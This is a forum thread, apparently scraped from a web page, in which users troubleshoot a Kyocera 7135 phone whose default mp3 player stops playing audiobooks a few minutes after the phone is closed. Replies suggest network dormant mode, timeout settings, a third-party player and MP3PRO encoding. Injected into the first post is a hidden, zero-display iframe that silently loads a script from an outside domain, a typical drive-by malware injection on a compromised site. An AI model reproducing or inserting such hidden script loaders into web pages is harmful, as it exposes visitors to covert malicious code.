I am using a 7135 to play audio books with the default mp3 player. I am using the standard Kyocera stereo headset for the 7135. When I start the mp3 playing, I close the phone and put it back in the belt holder. However, after a random amout of time (usually 1-3 minutes) it will stop playing. There are no errors or problems, it just stops. I have to open the phone and tell it to play again. Needless to say this makes this part of the phone pretty useless.
I have looked through both the phone and PDA preferences and can not seem to find one that should be causing this. Any body have any thoughts?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I really don't have a desire to purchase an BeHopper when the one I have plays mp3s fine and has all of the features that I need.
I just need to know if it stops playing when the phone is closed because of a setting, or is this a limitation of the player. I am hoping it is a setting that I am missing. If it is a limitation of the player, then I will look at BeHopper.
The auto-pausing of playback could be the 3G (Express Network) dormant mode shutting down. The built-in player may not handle this well. Bebopper includes an "auto-resume on call end" function that restarts playback after a voice or data call ends.
Alternately, you could try setting your network timeout to never. I can't really speak to the financial consequences of leaving that timeout on never due to some reported differences in carrier billing.
I had found the setting in the PDF Preferences that you are refuring to. Mine says "Never when open". And when the phone is open it seems to work. It is only when I close the phone that the mp3 shuts off after a short amount of time.
If you use nero and save the long MP3's as MP3PRO they won't stop. I listen to long tracks, some over 3 hours. Paul Oakenfold and some books on CD. I also found that if you plug in the 7135, like in the car using the adapter, it will run regradless of format. But if you want to listen unpluged, it must be in the MP3PRO format.
